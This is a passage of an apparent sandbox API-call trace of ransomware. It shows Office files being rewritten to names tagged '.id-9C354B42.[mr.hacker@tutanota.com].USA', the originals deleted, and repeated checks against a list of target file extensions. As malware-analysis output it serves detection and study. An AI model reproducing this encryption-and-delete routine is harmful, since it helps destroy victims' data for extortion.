lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xd0, lpOverlapped=0x0) returned 1 [0273.767] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.767] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xee, lpOverlapped=0x0) returned 1 [0273.767] SetEndOfFile (hFile=0x3a8) returned 1 [0273.767] CloseHandle (hObject=0x3a8) returned 1 [0273.767] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.767] SetEndOfFile (hFile=0x394) returned 1 [0273.770] CloseHandle (hObject=0x394) returned 1 [0273.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.770] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt")) returned 1 [0273.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.770] lstrlenW (lpString=".doc") returned 4 [0273.770] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0273.770] lstrlenW (lpString=".docx") returned 5 [0273.770] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0273.770] lstrlenW (lpString=".pdf") returned 4 [0273.771] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0273.771] lstrlenW (lpString=".xls") returned 4 [0273.771] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0273.771] lstrlenW (lpString=".xlsx") returned 5 [0273.771] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0273.771] lstrlenW (lpString=".ppt") returned 4 [0273.771] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0273.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.771] lstrlenW (lpString=".zip") returned 4 [0273.771] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0273.771] lstrlenW (lpString=".rar") returned 4 [0273.771] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0273.771] lstrlenW (lpString=".bz2") returned 4 [0273.771] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0273.771] lstrlenW (lpString=".7z") returned 3 [0273.771] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0273.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.771] lstrlenW (lpString=".dbf") returned 4 [0273.771] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0273.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.771] lstrlenW (lpString=".1cd") returned 4 [0273.771] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0273.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.771] lstrlenW (lpString=".jpg") returned 4 [0273.771] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0273.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.771] lstrlenW (lpString=".doc") returned 4 [0273.771] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0273.771] lstrlenW (lpString=".docx") returned 5 [0273.771] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0273.771] lstrlenW (lpString=".pdf") returned 4 [0273.772] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0273.772] lstrlenW (lpString=".xls") returned 4 [0273.772] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0273.772] lstrlenW (lpString=".xlsx") returned 5 [0273.772] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0273.772] lstrlenW (lpString=".ppt") returned 4 [0273.772] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0273.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.772] lstrlenW (lpString=".zip") returned 4 [0273.772] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0273.772] lstrlenW (lpString=".rar") returned 4 [0273.772] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0273.772] lstrlenW (lpString=".bz2") returned 4 [0273.772] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0273.772] lstrlenW (lpString=".7z") returned 3 [0273.772] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0273.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.772] lstrlenW (lpString=".dbf") returned 4 [0273.772] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0273.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.772] lstrlenW (lpString=".1cd") returned 4 [0273.772] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0273.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61 [0273.772] lstrlenW (lpString=".jpg") returned 4 [0273.772] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0273.772] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0273.772] lstrlenW (lpString="GRAPH_F_COL.HXK") returned 15 [0273.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.773] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=114) returned 1 [0273.773] CloseHandle (hObject=0x394) returned 1 [0273.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk")) returned 0x20 [0273.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.773] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.773] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.775] GetLastError () returned 0x0 [0273.775] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x72, lpOverlapped=0x0) returned 1 [0273.776] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x80, lpOverlapped=0x0) returned 1 [0273.776] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.776] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0273.776] SetEndOfFile (hFile=0x3a8) returned 1 [0273.776] CloseHandle (hObject=0x3a8) returned 1 [0273.776] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.776] SetEndOfFile (hFile=0x394) returned 1 [0273.778] CloseHandle (hObject=0x394) returned 1 [0273.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.779] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk")) returned 1 [0273.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.779] lstrlenW (lpString=".doc") returned 4 [0273.779] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0273.779] lstrlenW (lpString=".docx") returned 5 [0273.779] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0273.779] lstrlenW (lpString=".pdf") returned 4 [0273.779] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0273.779] lstrlenW (lpString=".xls") returned 4 [0273.779] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0273.779] lstrlenW (lpString=".xlsx") returned 5 [0273.779] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0273.779] lstrlenW (lpString=".ppt") returned 4 [0273.779] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0273.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.779] lstrlenW (lpString=".zip") returned 4 [0273.779] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0273.779] lstrlenW (lpString=".rar") returned 4 [0273.779] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0273.779] lstrlenW (lpString=".bz2") returned 4 [0273.780] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0273.780] lstrlenW (lpString=".7z") returned 3 [0273.780] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0273.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.780] lstrlenW (lpString=".dbf") returned 4 [0273.780] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0273.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.780] lstrlenW (lpString=".1cd") returned 4 [0273.780] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0273.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.780] lstrlenW (lpString=".jpg") returned 4 [0273.780] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0273.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.780] lstrlenW (lpString=".doc") returned 4 [0273.780] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0273.780] lstrlenW (lpString=".docx") returned 5 [0273.780] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0273.780] lstrlenW (lpString=".pdf") returned 4 [0273.780] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0273.780] lstrlenW (lpString=".xls") returned 4 [0273.780] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0273.780] lstrlenW (lpString=".xlsx") returned 5 [0273.780] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0273.780] lstrlenW (lpString=".ppt") returned 4 [0273.780] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0273.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.780] lstrlenW (lpString=".zip") returned 4 [0273.780] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0273.780] lstrlenW (lpString=".rar") returned 4 [0273.780] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0273.781] lstrlenW (lpString=".bz2") returned 4 [0273.781] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0273.781] lstrlenW (lpString=".7z") returned 3 [0273.781] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0273.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.781] lstrlenW (lpString=".dbf") returned 4 [0273.781] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0273.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.781] lstrlenW (lpString=".1cd") returned 4 [0273.781] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0273.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63 [0273.781] lstrlenW (lpString=".jpg") returned 4 [0273.781] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0273.781] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0273.781] lstrlenW (lpString="GRAPH_K_COL.HXK") returned 15 [0273.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.781] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=113) returned 1 [0273.781] CloseHandle (hObject=0x394) returned 1 [0273.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk")) returned 0x20 [0273.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.782] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.782] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.782] GetLastError () returned 0x0 [0273.782] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x71, lpOverlapped=0x0) returned 1 [0273.783] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x80, lpOverlapped=0x0) returned 1 [0273.784] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.784] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0273.784] SetEndOfFile (hFile=0x3a8) returned 1 [0273.784] CloseHandle (hObject=0x3a8) returned 1 [0273.784] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.784] SetEndOfFile (hFile=0x394) returned 1 [0273.786] CloseHandle (hObject=0x394) returned 1 [0273.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.786] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk")) returned 1 [0273.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.786] lstrlenW (lpString=".doc") returned 4 [0273.786] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0273.786] lstrlenW (lpString=".docx") returned 5 [0273.786] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0273.787] lstrlenW (lpString=".pdf") returned 4 [0273.787] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0273.787] lstrlenW (lpString=".xls") returned 4 [0273.787] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0273.787] lstrlenW (lpString=".xlsx") returned 5 [0273.787] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0273.787] lstrlenW (lpString=".ppt") returned 4 [0273.787] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0273.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.787] lstrlenW (lpString=".zip") returned 4 [0273.787] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0273.787] lstrlenW (lpString=".rar") returned 4 [0273.787] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0273.787] lstrlenW (lpString=".bz2") returned 4 [0273.787] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0273.787] lstrlenW (lpString=".7z") returned 3 [0273.787] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0273.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.787] lstrlenW (lpString=".dbf") returned 4 [0273.787] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0273.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.787] lstrlenW (lpString=".1cd") returned 4 [0273.787] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0273.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.787] lstrlenW (lpString=".jpg") returned 4 [0273.787] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0273.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.787] lstrlenW (lpString=".doc") returned 4 [0273.787] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0273.787] lstrlenW (lpString=".docx") returned 5 [0273.787] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0273.788] lstrlenW (lpString=".pdf") returned 4 [0273.788] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0273.788] lstrlenW (lpString=".xls") returned 4 [0273.788] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0273.788] lstrlenW (lpString=".xlsx") returned 5 [0273.788] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0273.788] lstrlenW (lpString=".ppt") returned 4 [0273.788] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.788] lstrlenW (lpString=".zip") returned 4 [0273.788] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0273.788] lstrlenW (lpString=".rar") returned 4 [0273.788] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0273.788] lstrlenW (lpString=".bz2") returned 4 [0273.788] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0273.788] lstrlenW (lpString=".7z") returned 3 [0273.788] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.788] lstrlenW (lpString=".dbf") returned 4 [0273.788] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.788] lstrlenW (lpString=".1cd") returned 4 [0273.788] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63 [0273.788] lstrlenW (lpString=".jpg") returned 4 [0273.788] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0273.788] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0273.788] lstrlenW (lpString="GRINTL32.DLL") returned 12 [0273.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.014] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=208256) returned 1 [0274.014] CloseHandle (hObject=0x3c0) returned 1 [0274.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll")) returned 0x20 [0274.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.015] lstrlenW (lpString=".doc") returned 4 [0274.015] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.015] lstrlenW (lpString=".docx") returned 5 [0274.015] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1 [0274.015] lstrlenW (lpString=".pdf") returned 4 [0274.015] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.015] lstrlenW (lpString=".xls") returned 4 [0274.015] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.015] lstrlenW (lpString=".xlsx") returned 5 [0274.015] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1 [0274.015] lstrlenW (lpString=".ppt") returned 4 [0274.015] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.015] lstrlenW (lpString=".zip") returned 4 [0274.015] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.015] lstrlenW (lpString=".rar") returned 4 [0274.016] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.016] lstrlenW (lpString=".bz2") returned 4 [0274.016] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.016] lstrlenW (lpString=".7z") returned 3 [0274.016] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.016] lstrlenW (lpString=".dbf") returned 4 [0274.016] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.016] lstrlenW (lpString=".1cd") returned 4 [0274.016] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.016] lstrlenW (lpString=".jpg") returned 4 [0274.016] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 